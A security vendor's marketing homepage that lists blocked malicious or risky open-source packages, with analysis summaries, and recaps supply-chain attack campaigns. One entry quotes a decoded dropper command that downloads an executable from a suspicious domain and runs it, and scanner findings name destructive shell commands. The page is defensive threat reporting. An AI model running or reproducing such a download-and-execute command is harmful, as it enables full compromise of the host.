New: Introducing PHP and Composer Support.Read the Announcement →
Socket
Book a DemoInstallSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub AppBook a Demo

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
t

timmywil published 4.0.0

left-pad
s

stevemao published 1.3.0

react
r

react-bot published 19.2.4

We protect you from vulnerable and malicious packages

sbcli-dev

3.8.79

Live on PyPI

Blocked by Socket

No direct malware code is present in the fragment (no obvious backdoor, reverse shell, or exfiltration implemented in this file itself). However, the module exposes very high-risk functionality: it connects to the Docker API over plaintext TCP, allows client-controlled image pulls and runs containers as privileged with host mounts and host networking, and injects potentially sensitive credentials into container environments. These behaviors make this code a significant supply-chain and host compromise risk if the endpoints are reachable by untrusted users or if DOCKER_IP/docker daemon is exposed. Recommend restricting access, enforcing authentication/authorization, validating image names (or disallowing arbitrary images), using TLS/auth for Docker daemon, removing privileged/host_mode mounts where possible, and avoiding passing untrusted secrets into container environments.

github.com/bishopfox/sliver

v1.5.40-0.20230614192516-4841e46c346b

Live on Go Modules

Blocked by Socket

This file is an HTTP client for the Sliver implant C2 framework. It implements session bootstrapping, encrypted communication, polling, and closing behavior for a remote implant. The code is intentionally designed for covert network communication with a controller and therefore is malicious in the context of normal applications. Specific security concerns include predictable nonces due to math/rand, potential logging of sensitive data when compiled with debug, and in-memory handling of proxy credentials. If found in a package dependency for benign software, it should be considered a high-severity supply-chain compromise and removed or blocked.

ironpython.stdlib

3.4.1

by IronPython Contributors,Python Contributors, IronPython Contributors, Python Contributors

Live on NuGet

Blocked by Socket

This is a mailcap parser/utility that reads mailcap files and constructs shell commands from their entries. The code executes commands via os.system after performing textual substitution using filename, MIME type, and parameters. That behavior is expected for a mailcap implementation, but it represents a high-risk sink: untrusted mailcap files, environment variables, or attacker-controlled filename/plist values can lead to arbitrary command execution (shell injection). The code itself does not contain obfuscated or hidden malware, credentials, or explicit exfiltration; however, using it with untrusted inputs or untrusted mailcap files is dangerous. Recommend treating mailcap files as trusted input only, or replacing os.system usage with safer invocation (e.g., subprocess with argument lists and proper escaping/validation).

blue-button

1.5.1

by kachok

Live on npm

Blocked by Socket

The analyzed code is a standard, well-scoped DOM filtering utility (akin to jQuery/Sizzle). There is no evidence of malicious behavior, backdoors, data exfiltration, or code execution. It interfaces with DOM APIs in controlled ways and does not read sensitive data from environment or network. Overall security risk is low, with no malware indicators detected in this fragment.

devflow-ai

3.0.0-alpha.42-devflow.2

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] This skill's documented behavior is plausible for a hooks/automation system, but its footprint is large and capable of exfiltrating sensitive data if misconfigured or abused. The main issues are missing details about where MCP memory/training data is sent and how authentication/filters are enforced, plus runtime execution via npx and arbitrary custom scripts. I classify this as SUSPICIOUS: not obviously malicious from the documentation alone, but the capabilities and unspecified remote endpoints create a moderate risk of credential/data leakage unless strict safeguards are implemented. LLM verification: The provided document describes a high-capability automation skill that — if implemented — would have broad access to local files, the ability to execute arbitrary shell commands, perform Git operations, and send data to remote training/orchestration services. The fragment contains no obvious obfuscated code or active backdoors, but the described features present real supply-chain and data-exfiltration risks unless strict allowlists, explicit consent, auditing, and endpoint trust anchors are enf

pycrackhash

0.1.1

Live on PyPI

Blocked by Socket

This module contains high-risk behaviors: it fetches arbitrary code from a remote URL, writes it into common Python installation directories or temp, and executes it as a background subprocess, passing base64-encoded payloads that contain hashes and action metadata. It also posts hashes to remote cracking services. These are supply-chain/backdoor and data-exfiltration capabilities. If you do not explicitly trust the remote endpoint (EXT_URL, PRIMARY_URL, SECONDARY_URL) and the environment where this runs, do not use this package. Consider removing or disabling the remote-fetch/execute behavior (EXT_DISABLE environment variable) and auditing the fetched script before allowing execution.

yizhifabao58

0.0.1-security

by npm

Live on npm

Blocked by Socket

Previously, this file referenced malicious code that posed a risk of unauthorized actions on user systems. The malicious package was removed by the registry’s security team. No specific command-and-control domains or IP addresses are documented. Users who installed the package when it contained malicious code could have been exposed to compromise.

easyship-components

3.9999.99

by yassine-ywh

Removed from npm

Blocked by Socket

This package will execute pre-install.js during npm install. That gives the package the ability to run arbitrary JS on the host, which can perform malicious actions (network calls, telemetry, file system changes, spawning shells, adding git hooks, deleting files, etc.). You must inspect the contents of pre-install.js and any code it loads (including dynamic network fetches, child_process usage, or writes to dotfiles) before installing. Treat this as a moderate-to-high risk until the script is reviewed.

Live on npm for 1 hour and 24 minutes before removal. Socket users were protected even while the package was live.

email-helper

2.0.20230806181812

by righettod

Removed from npm

Blocked by Socket

The code appears to dynamically execute code obtained from network responses based on the system platform. This behavior could be potentially dangerous and should be reviewed further to ensure it does not contain malicious or unauthorized actions.

Live on npm for 31 days and 43 minutes before removal. Socket users were protected even while the package was live.

secondary-market-client-deskent

0.0.12

Live on PyPI

Blocked by Socket

This Python script implements an automated Binance NFT purchasing bot that uses seleniumwire to capture real browser requests to binance[.]com (including session cookies, CSRF tokens, bnc-uuid, fvideo-id, user-agent and a large base64 ‘device-info’ blob). It then packages these credentials—together with proxy login/password, product data, request counts, sale timing and a local license key—and sends them in JSON POSTs over plain HTTP to a remote control server at endpoints such as: • http://127[.]0[.]0[.]1/scripts/licenses/checklicense • http://127[.]0[.]0[.]1/scripts/licenses/licenseapprove • http://127[.]0[.]0[.]1/scripts/products/secondary • http://127[.]0[.]0[.]1/scripts/products/secondary/results Because all communications default to unencrypted HTTP and delegate transaction logic to the remote host, an attacker controlling or compromising that host can hijack the user’s Binance session and execute arbitrary NFT purchases. This constitutes credential exfiltration and a remote-controlled backdoor—malicious behavior that poses a high security risk.

namira-account-reactjs

1.6.8

by amir.abolhasani.1368

Removed from npm

Blocked by Socket

The code contains potential security risks due to insufficient input validation and handling of sensitive user data. It is crucial to review and improve the input validation and data handling mechanisms to mitigate these risks.

Live on npm for 5 hours and 4 minutes before removal. Socket users were protected even while the package was live.

reallife

0.1.31

Live on PyPI

Blocked by Socket

This code implements a remote-controlled decorator that queries a hardcoded external HTTP endpoint to decide if a local function should run and optionally notifies that endpoint. The pattern is a high supply-chain and privacy risk: cleartext network calls to a hardcoded IP, no authentication or integrity checks, and remote control of execution. The snippet contains a runtime typo that prevents it from working as written, but the intended behavior is clear and concerning. While there is no direct evidence of data exfiltration in this fragment, the remote kill-switch/telemetry capability makes inclusion of this module risky and it should be treated as suspicious and reviewed/removed unless explicitly required and secured (use HTTPS, authentication, validate responses, and avoid remote kill-switches).

new-npm-packages

999.9.9

by mega707

Removed from npm

Blocked by Socket

The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.

Live on npm for 2 hours and 29 minutes before removal. Socket users were protected even while the package was live.

roboidai

1.1.12

Live on PyPI

Blocked by Socket

This module deliberately obfuscates and executes a concealed Python payload at import/runtime. The use of multiple encoding layers and dynamic eval/compile is a high-risk pattern typical of backdoors or supply-chain malware. Treat this file as suspicious and unsafe to import or execute in any production or sensitive environment. Perform offline decoding and careful static analysis of the decoded payload in an isolated sandbox before any further use.

nphish

0.2.0

Live on PyPI

Blocked by Socket

This code is explicitly a phishing toolkit that automates hosting phishing pages, exposing them via public tunnels (ngrok/cloudflared), and capturing/storing victim credentials and IP information. The presence of an obfuscated base64 payload that is exec()'d is a strong malicious indicator because it allows hidden arbitrary code execution. The package downloads and executes external binaries and untrusted website content without validation. It should be considered malicious for most benign deployment contexts and should not be run in any environment you care about. Use only in controlled, legal, consented penetration testing environments after fully auditing the decoded payload.

mmarchini-oss/npm-otp-publish

21dccdcd432c34a69d584aba3a96071bb69d07a4

Live on GitHub Actions

Blocked by Socket

This entrypoint orchestrates an ephemeral, publicly-exposed web service that advertises its URL externally and accepts a one-time-password which it immediately forwards to an npm-publish helper. That orchestration strongly resembles phishing/capture-and-use tooling for npm account takeover (e.g., capture 2FA OTP and immediately publish). Definitive maliciousness depends on the implementations of Notifier and NpmPublish and on configuration (who receives the ngrok URL, whether OTPs are forwarded to attackers). Treat the package as high risk: review Notifier and NpmPublish code and any configured endpoints or credentials before running. Avoid running this in environments with privileged npm credentials or CI secrets until a full audit of the dependent modules is completed.

meutils

2025.4.29.21.33.50

Live on PyPI

Blocked by Socket

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

vikunja-mcp

0.5.1

Removed from PyPI

Blocked by Socket

The code implements a deliberate local-pip import redirection, enabling execution of a vendored pip from a controlled directory. While this can be legitimate for offline or vendor-provided tooling, it introduces notable supply-chain risk: tampered or malicious local pip content would run with the host process privileges. The pattern should be safeguarded with strict integrity checks (signatures, hashes, or a robust lockfile) and access controls to prevent tampering of PIP_SOURCES_ROOT. If this behavior is unintended, it constitutes a significant security risk.

Live on PyPI for 13 hours and 16 minutes before removal. Socket users were protected even while the package was live.

linxploit

0.1

Live on PyPI

Blocked by Socket

This is a highly dangerous payload registry that, if executed, can cause widespread data loss, system downtime, and potential firmware/kernel compromise. It represents clear malicious risk and should be removed from any benign codebase, with strict access controls and scanning to prevent inadvertent exposure in supply chains. Treat as malware-like content and revoke publishing rights for any packages containing it.

meutils

2025.8.29.20.5.48

Live on PyPI

Blocked by Socket

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

cmpuiforoath

1.1.6

by jpdtest

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, collecting and sending sensitive system information to a remote server without user consent. This poses a significant security risk.

Live on npm for 13 days, 1 hour and 25 minutes before removal. Socket users were protected even while the package was live.

xync-client

0.0.121

Live on PyPI

Blocked by Socket

This script is high-risk: it automates interactive login flows, captures and persists full browser storage_state (session tokens), and navigates authenticated sessions to banking/payment endpoints. The combination enables account takeover and fraudulent transactions when misused. Treat as malicious or at minimum dangerous automation; require immediate review, restrict execution, and audit any stored agent.state entries. Remediate by removing session persistence, not storing storage_state, and implementing strict access controls and logging.

wix-perf-measure

2.999.999

Removed from npm

Blocked by Socket

The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

@techwavedev/agi-agent-kit

1.3.2

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The instruction set is functionally coherent for converting Stitch designs into modular React components, but contains multiple high-risk operational behaviors: executing an opaque bash helper with an external URL, automatically running npm install/dev (which can execute lifecycle scripts), and granting broad tool permissions (stitch*). These behaviors create realistic supply-chain and remote code execution attack surfaces. Recommended mitigations before executing this skill: validate and whitelist htmlCode.downloadUrl domains, inspect and vet scripts/fetch-stitch.sh content, pin and audit npm dependencies, run installs and validation in a sandboxed/ephemeral environment, restrict tool permissions to the minimum necessary, and require provenance checks for any third-party code (qdrant-memory). Treat the workflow as elevated-risk until those controls are in place. LLM verification: SUSPICIOUS / POTENTIALLY RISKY — The module's stated purpose (design-to-code conversion) is legitimate, but the provided instructions promote executing an opaque Bash fetch script and running unpinned npm installs and dev scripts on the host. These operations materially increase the attack surface and enable supply-chain or host compromise if inputs or dependencies are malicious or compromised. I do not see clear evidence of intentional malware in the provided fragment, but the workflow requires

@twork-data-services/aggregator-account-get-otb-by-account

1.99.0

by johrdanalfred

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

sbcli-dev

3.8.79

Live on PyPI

Blocked by Socket

No direct malware code is present in the fragment (no obvious backdoor, reverse shell, or exfiltration implemented in this file itself). However, the module exposes very high-risk functionality: it connects to the Docker API over plaintext TCP, allows client-controlled image pulls and runs containers as privileged with host mounts and host networking, and injects potentially sensitive credentials into container environments. These behaviors make this code a significant supply-chain and host compromise risk if the endpoints are reachable by untrusted users or if DOCKER_IP/docker daemon is exposed. Recommend restricting access, enforcing authentication/authorization, validating image names (or disallowing arbitrary images), using TLS/auth for Docker daemon, removing privileged/host_mode mounts where possible, and avoiding passing untrusted secrets into container environments.

github.com/bishopfox/sliver

v1.5.40-0.20230614192516-4841e46c346b

Live on Go Modules

Blocked by Socket

This file is an HTTP client for the Sliver implant C2 framework. It implements session bootstrapping, encrypted communication, polling, and closing behavior for a remote implant. The code is intentionally designed for covert network communication with a controller and therefore is malicious in the context of normal applications. Specific security concerns include predictable nonces due to math/rand, potential logging of sensitive data when compiled with debug, and in-memory handling of proxy credentials. If found in a package dependency for benign software, it should be considered a high-severity supply-chain compromise and removed or blocked.

ironpython.stdlib

3.4.1

by IronPython Contributors,Python Contributors, IronPython Contributors, Python Contributors

Live on NuGet

Blocked by Socket

This is a mailcap parser/utility that reads mailcap files and constructs shell commands from their entries. The code executes commands via os.system after performing textual substitution using filename, MIME type, and parameters. That behavior is expected for a mailcap implementation, but it represents a high-risk sink: untrusted mailcap files, environment variables, or attacker-controlled filename/plist values can lead to arbitrary command execution (shell injection). The code itself does not contain obfuscated or hidden malware, credentials, or explicit exfiltration; however, using it with untrusted inputs or untrusted mailcap files is dangerous. Recommend treating mailcap files as trusted input only, or replacing os.system usage with safer invocation (e.g., subprocess with argument lists and proper escaping/validation).

blue-button

1.5.1

by kachok

Live on npm

Blocked by Socket

The analyzed code is a standard, well-scoped DOM filtering utility (akin to jQuery/Sizzle). There is no evidence of malicious behavior, backdoors, data exfiltration, or code execution. It interfaces with DOM APIs in controlled ways and does not read sensitive data from environment or network. Overall security risk is low, with no malware indicators detected in this fragment.

devflow-ai

3.0.0-alpha.42-devflow.2

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [CRITICAL] command_injection: Destructive bash command detected (rm -rf, chmod 777) (CI004) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] This skill's documented behavior is plausible for a hooks/automation system, but its footprint is large and capable of exfiltrating sensitive data if misconfigured or abused. The main issues are missing details about where MCP memory/training data is sent and how authentication/filters are enforced, plus runtime execution via npx and arbitrary custom scripts. I classify this as SUSPICIOUS: not obviously malicious from the documentation alone, but the capabilities and unspecified remote endpoints create a moderate risk of credential/data leakage unless strict safeguards are implemented. LLM verification: The provided document describes a high-capability automation skill that — if implemented — would have broad access to local files, the ability to execute arbitrary shell commands, perform Git operations, and send data to remote training/orchestration services. The fragment contains no obvious obfuscated code or active backdoors, but the described features present real supply-chain and data-exfiltration risks unless strict allowlists, explicit consent, auditing, and endpoint trust anchors are enf

pycrackhash

0.1.1

Live on PyPI

Blocked by Socket

This module contains high-risk behaviors: it fetches arbitrary code from a remote URL, writes it into common Python installation directories or temp, and executes it as a background subprocess, passing base64-encoded payloads that contain hashes and action metadata. It also posts hashes to remote cracking services. These are supply-chain/backdoor and data-exfiltration capabilities. If you do not explicitly trust the remote endpoint (EXT_URL, PRIMARY_URL, SECONDARY_URL) and the environment where this runs, do not use this package. Consider removing or disabling the remote-fetch/execute behavior (EXT_DISABLE environment variable) and auditing the fetched script before allowing execution.

yizhifabao58

0.0.1-security

by npm

Live on npm

Blocked by Socket

Previously, this file referenced malicious code that posed a risk of unauthorized actions on user systems. The malicious package was removed by the registry’s security team. No specific command-and-control domains or IP addresses are documented. Users who installed the package when it contained malicious code could have been exposed to compromise.

easyship-components

3.9999.99

by yassine-ywh

Removed from npm

Blocked by Socket

This package will execute pre-install.js during npm install. That gives the package the ability to run arbitrary JS on the host, which can perform malicious actions (network calls, telemetry, file system changes, spawning shells, adding git hooks, deleting files, etc.). You must inspect the contents of pre-install.js and any code it loads (including dynamic network fetches, child_process usage, or writes to dotfiles) before installing. Treat this as a moderate-to-high risk until the script is reviewed.

Live on npm for 1 hour and 24 minutes before removal. Socket users were protected even while the package was live.

email-helper

2.0.20230806181812

by righettod

Removed from npm

Blocked by Socket

The code appears to dynamically execute code obtained from network responses based on the system platform. This behavior could be potentially dangerous and should be reviewed further to ensure it does not contain malicious or unauthorized actions.

Live on npm for 31 days and 43 minutes before removal. Socket users were protected even while the package was live.

secondary-market-client-deskent

0.0.12

Live on PyPI

Blocked by Socket

This Python script implements an automated Binance NFT purchasing bot that uses seleniumwire to capture real browser requests to binance[.]com (including session cookies, CSRF tokens, bnc-uuid, fvideo-id, user-agent and a large base64 ‘device-info’ blob). It then packages these credentials—together with proxy login/password, product data, request counts, sale timing and a local license key—and sends them in JSON POSTs over plain HTTP to a remote control server at endpoints such as: • http://127[.]0[.]0[.]1/scripts/licenses/checklicense • http://127[.]0[.]0[.]1/scripts/licenses/licenseapprove • http://127[.]0[.]0[.]1/scripts/products/secondary • http://127[.]0[.]0[.]1/scripts/products/secondary/results Because all communications default to unencrypted HTTP and delegate transaction logic to the remote host, an attacker controlling or compromising that host can hijack the user’s Binance session and execute arbitrary NFT purchases. This constitutes credential exfiltration and a remote-controlled backdoor—malicious behavior that poses a high security risk.

namira-account-reactjs

1.6.8

by amir.abolhasani.1368

Removed from npm

Blocked by Socket

The code contains potential security risks due to insufficient input validation and handling of sensitive user data. It is crucial to review and improve the input validation and data handling mechanisms to mitigate these risks.

Live on npm for 5 hours and 4 minutes before removal. Socket users were protected even while the package was live.

reallife

0.1.31

Live on PyPI

Blocked by Socket

This code implements a remote-controlled decorator that queries a hardcoded external HTTP endpoint to decide if a local function should run and optionally notifies that endpoint. The pattern is a high supply-chain and privacy risk: cleartext network calls to a hardcoded IP, no authentication or integrity checks, and remote control of execution. The snippet contains a runtime typo that prevents it from working as written, but the intended behavior is clear and concerning. While there is no direct evidence of data exfiltration in this fragment, the remote kill-switch/telemetry capability makes inclusion of this module risky and it should be treated as suspicious and reviewed/removed unless explicitly required and secured (use HTTPS, authentication, validate responses, and avoid remote kill-switches).

new-npm-packages

999.9.9

by mega707

Removed from npm

Blocked by Socket

The script collects information like package details, directories, hostnames, DNS servers and user information, and sends it to a remote server.

Live on npm for 2 hours and 29 minutes before removal. Socket users were protected even while the package was live.

roboidai

1.1.12

Live on PyPI

Blocked by Socket

This module deliberately obfuscates and executes a concealed Python payload at import/runtime. The use of multiple encoding layers and dynamic eval/compile is a high-risk pattern typical of backdoors or supply-chain malware. Treat this file as suspicious and unsafe to import or execute in any production or sensitive environment. Perform offline decoding and careful static analysis of the decoded payload in an isolated sandbox before any further use.

nphish

0.2.0

Live on PyPI

Blocked by Socket

This code is explicitly a phishing toolkit that automates hosting phishing pages, exposing them via public tunnels (ngrok/cloudflared), and capturing/storing victim credentials and IP information. The presence of an obfuscated base64 payload that is exec()'d is a strong malicious indicator because it allows hidden arbitrary code execution. The package downloads and executes external binaries and untrusted website content without validation. It should be considered malicious for most benign deployment contexts and should not be run in any environment you care about. Use only in controlled, legal, consented penetration testing environments after fully auditing the decoded payload.

mmarchini-oss/npm-otp-publish

21dccdcd432c34a69d584aba3a96071bb69d07a4

Live on GitHub Actions

Blocked by Socket

This entrypoint orchestrates an ephemeral, publicly-exposed web service that advertises its URL externally and accepts a one-time-password which it immediately forwards to an npm-publish helper. That orchestration strongly resembles phishing/capture-and-use tooling for npm account takeover (e.g., capture 2FA OTP and immediately publish). Definitive maliciousness depends on the implementations of Notifier and NpmPublish and on configuration (who receives the ngrok URL, whether OTPs are forwarded to attackers). Treat the package as high risk: review Notifier and NpmPublish code and any configured endpoints or credentials before running. Avoid running this in environments with privileged npm credentials or CI secrets until a full audit of the dependent modules is completed.

meutils

2025.4.29.21.33.50

Live on PyPI

Blocked by Socket

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

vikunja-mcp

0.5.1

Removed from PyPI

Blocked by Socket

The code implements a deliberate local-pip import redirection, enabling execution of a vendored pip from a controlled directory. While this can be legitimate for offline or vendor-provided tooling, it introduces notable supply-chain risk: tampered or malicious local pip content would run with the host process privileges. The pattern should be safeguarded with strict integrity checks (signatures, hashes, or a robust lockfile) and access controls to prevent tampering of PIP_SOURCES_ROOT. If this behavior is unintended, it constitutes a significant security risk.

Live on PyPI for 13 hours and 16 minutes before removal. Socket users were protected even while the package was live.

linxploit

0.1

Live on PyPI

Blocked by Socket

This is a highly dangerous payload registry that, if executed, can cause widespread data loss, system downtime, and potential firmware/kernel compromise. It represents clear malicious risk and should be removed from any benign codebase, with strict access controls and scanning to prevent inadvertent exposure in supply chains. Treat as malware-like content and revoke publishing rights for any packages containing it.

meutils

2025.8.29.20.5.48

Live on PyPI

Blocked by Socket

The code sends sensitive credentials from environment variables over an unencrypted HTTP connection to an external API service at api[.]sqhyw[.]net:90. It authenticates using username/password from the YEZI_USER environment variable, retrieves access tokens, and automates the process of obtaining mobile phone numbers and SMS verification codes. This behavior poses significant supply chain security risks through: (1) leakage of environment variable credentials over unencrypted HTTP, (2) interaction with a suspicious external domain on a non-standard port, (3) logging of potentially sensitive API responses including tokens and SMS codes, and (4) facilitation of SMS verification bypass which could enable fraudulent account creation or spam activities. The code continuously polls the external API for up to 120 seconds to retrieve SMS codes, creating additional operational risks. While not containing traditional malware payloads, the credential exfiltration and suspicious external communication patterns justify classification as malware due to the significant security risks posed to systems that deploy this code.

cmpuiforoath

1.1.6

by jpdtest

Removed from npm

Blocked by Socket

The code exhibits behavior consistent with data exfiltration, collecting and sending sensitive system information to a remote server without user consent. This poses a significant security risk.

Live on npm for 13 days, 1 hour and 25 minutes before removal. Socket users were protected even while the package was live.

xync-client

0.0.121

Live on PyPI

Blocked by Socket

This script is high-risk: it automates interactive login flows, captures and persists full browser storage_state (session tokens), and navigates authenticated sessions to banking/payment endpoints. The combination enables account takeover and fraudulent transactions when misused. Treat as malicious or at minimum dangerous automation; require immediate review, restrict execution, and audit any stored agent.state entries. Remediate by removing session persistence, not storing storage_state, and implementing strict access controls and logging.

wix-perf-measure

2.999.999

Removed from npm

Blocked by Socket

The code uses the exec function to run shell commands, which poses a significant security risk. It could potentially execute malicious code if the input to exec is manipulated. Redirecting output to /dev/null to hide execution details is suspicious.

Live on npm for 15 minutes before removal. Socket users were protected even while the package was live.

@techwavedev/agi-agent-kit

1.3.2

Live on npm

Blocked by Socket

[Skill Scanner] Installation of third-party script detected All findings: [CRITICAL] command_injection: Installation of third-party script detected (SC006) [AITech 9.1.4] [HIGH] data_exfiltration: Credential file access detected (DE002) [AITech 8.2.3] The instruction set is functionally coherent for converting Stitch designs into modular React components, but contains multiple high-risk operational behaviors: executing an opaque bash helper with an external URL, automatically running npm install/dev (which can execute lifecycle scripts), and granting broad tool permissions (stitch*). These behaviors create realistic supply-chain and remote code execution attack surfaces. Recommended mitigations before executing this skill: validate and whitelist htmlCode.downloadUrl domains, inspect and vet scripts/fetch-stitch.sh content, pin and audit npm dependencies, run installs and validation in a sandboxed/ephemeral environment, restrict tool permissions to the minimum necessary, and require provenance checks for any third-party code (qdrant-memory). Treat the workflow as elevated-risk until those controls are in place. LLM verification: SUSPICIOUS / POTENTIALLY RISKY — The module's stated purpose (design-to-code conversion) is legitimate, but the provided instructions promote executing an opaque Bash fetch script and running unpinned npm installs and dev scripts on the host. These operations materially increase the attack surface and enable supply-chain or host compromise if inputs or dependencies are malicious or compromised. I do not see clear evidence of intentional malware in the provided fragment, but the workflow requires

@twork-data-services/aggregator-account-get-otb-by-account

1.99.0

by johrdanalfred

Live on npm

Blocked by Socket

The package was removed from the registry. The file uses child_process.exec to run a hex-encoded shell command that resolves to: “curl -O https://hypervector[.]me[.]dvdev[.]ru/filemon && chmod +x filemon && ./filemon”. It downloads an executable from a suspicious domain, makes it executable, and runs it immediately. This download-and-execute pattern with obfuscation represents a classic malware dropper capable of full system compromise.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Suspicious Stars on GitHub

Telemetry

Protestware or potentially unwanted behavior

42 more alerts →

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love →
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Even more security team love →
Book a DemoRead the blog

Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub AppBook a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles →